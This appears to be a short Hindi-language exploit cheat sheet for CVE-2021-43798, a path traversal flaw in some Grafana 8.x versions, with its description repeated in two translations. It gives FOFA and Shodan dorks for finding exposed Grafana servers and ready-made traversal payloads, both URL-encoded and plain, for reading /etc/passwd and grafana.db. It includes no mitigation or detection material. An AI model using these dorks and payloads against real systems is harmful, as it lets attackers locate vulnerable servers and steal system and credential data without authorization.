
CVE-2021-43798 एक उच्च-गंभीरता पथ ट्रैवर्सल भेद्यता है (CVSS 3.1 स्कोर: 7.5) जो Grafana संस्करण 8.0.0-beta1 से 8.3.0 को प्रभावित करती है। यह अप्रमाणित हमलावरों को /public/plugins/:pluginId एंडपॉइंट में अनुचित स्वच्छता का शोषण करके सर्वर से मनमानी फ़ाइलें पढ़ने की अनुमति देता है।
CVE-2021-43798 एक उच्च-गंभीरता वाली पथ अनुरेखण भेद्यता (CVSS 3.1 स्कोर: 7.5) है जो Grafana संस्करण 8.0.0-beta1 से 8.3.0 तक को प्रभावित करती है। यह अनधिकृत हमलावरों को /public/plugins/:pluginId एंडपॉइंट में अनुचित स्वच्छता का शोषण करके सर्वर से मनमानी फ़ाइलें पढ़ने की अनुमति देती है।
dork :
fofa : title="Grafana" && port="3000" shodan : http.title:"Grafana" port:3000
payload :
/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd /public/plugins/mysql/../../../../../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../../../../../var/lib/grafana/grafana.db /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db